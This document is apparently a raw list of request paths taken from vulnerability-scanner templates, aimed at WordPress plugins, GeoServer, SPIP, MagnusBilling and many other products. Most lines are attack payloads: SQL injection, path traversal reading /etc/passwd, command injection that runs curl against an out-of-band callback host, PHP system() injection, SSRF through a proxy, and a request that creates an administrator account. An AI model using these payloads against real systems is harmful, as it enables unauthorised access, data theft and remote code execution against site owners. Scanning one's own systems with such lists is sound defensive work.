/horde/admin/user.php
/admin/user.php
/CMSInstall/install.aspx
/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-
/wp-json/visualizer/v1/upload-data
/query?db=db&q=SHOW%20DATABASES
/wp-content/plugins/seo-by-rank-math/readme.txt
/api/experimental/latest_runs
/console/login/LoginForm.jsp
/settings
/indexer/settings
/oam/server/opensso/sessionservice
/about_state
/wan.htm

/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}
/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo
/plugin
/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test
/api/agent/tabs/agentData
/cgi-bin-hax/ExportSettings.sh
/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL
/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==
/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
/main/webservices/additional_webservices.php
/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}
/WebInterface
/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}
/WebInterface/{{dirname}}/{{filename}}
/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}
/wp-content/plugins/backup-backup/readme.txt
/wp-content/plugins/backup-backup/includes/backup-heart.php
/api/v1/serverinfo
/rest/users/1/settings/
/wp-content/plugins/easy-digital-downloads/readme.txt
/nmc/rpc/log_getfile
/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/mftp/
/
{{js}}
/sse?transportType=stdio&command=echo&args[]=hello-from-brower
/ws/v1/cluster/apps/new-application
/ipython/tree
/lab/api/settings/
/pods
/api/v1/pods
/images/json
/inventory
/web/database/manager
/v1/submissions
/api/backup
/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}
/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}
/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}
/?s=codepeople-image-store&post_type=page&feed=rss2
/api/v1/monitor/messages
{{pagepath}}
/cors?url=http://127.0.0.1:8080/version
/cors?url=http://{{interactsh-url}}/version
/importer
/contact
/contact-us
/wp-content/uploads/wp_dndcf7_uploads/{{path}}/{{renamed}}
/?BazaR&vue=formulaire
/wp-content/plugins/burst-statistics/readme.txt
/wp-json/wp/v2/users
/de2api/user/info
/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
/wp-content/plugins/everest-forms-pro/readme.txt
/wp-json/wp/v2/pages?per_page=100
/wp-content/plugins/armember-membership/readme.txt
/index.php?rest_route=/wp/v2/pages&per_page=100
